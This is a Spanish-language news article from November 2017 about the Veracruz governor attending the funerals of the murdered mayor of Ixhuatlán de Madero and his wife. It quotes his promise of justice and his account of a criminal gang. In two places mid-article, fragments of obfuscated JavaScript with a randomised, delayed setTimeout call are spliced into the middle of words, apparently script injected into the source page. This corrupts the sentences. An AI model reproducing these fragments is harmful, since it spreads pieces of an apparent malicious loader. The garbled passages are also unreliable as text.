Asiste Gobernador Yunes a funerales del Presidente de Ixhuatlán de Madero y de su esposa

27 noviembre, 2017

 

Ixhuatlán. Al asistir a los funerales del Presidente municipal de Ixhuatlán de Madero y de su esposa, el gobernador de Veracruz, Miguel Ángel Yunes Linares, afirmó que se hará justicia a la familia y a los habitantes del municipio.

Dijo que desde la noche del viernes iniciaron las investigaciones y éstas continúan en curso, por lo que se llegará a quienes fueron los autores materiales de este asesinato.

“Lo haré porque es mi compromiso como Gobernador del Estado, pero también lo haré como amigo de Víctor y de su familia”, subrayó.

El mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andatario estatal confirmó que el Alcalde fue sorprendido y engañado por una bandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda delictiva, la cual ya había cometido otros crímenes similares y en la que participan exempleados de la administración anterior, que ya están ubicados.

Señaló que esta situación fue originada por un problema que se vive en Veracruz desde hace muchos años: el de la corrupción.

“Saquearon bodegas completas del Gobierno del Estado, para después armar una red de delincuentes que ofertaban láminas, despensas, cobijas, una serie de elementos, y sorprendían a personas”, sostuvo.

El gobernador Yunes montó guardia de honor ante los féretros del Alcalde Víctor Manuel Espinoza Tolentino y de su esposa, la señora Hilda Patricia Carrera Tinoco.

Fuente: Coordinación General de Comunicación Social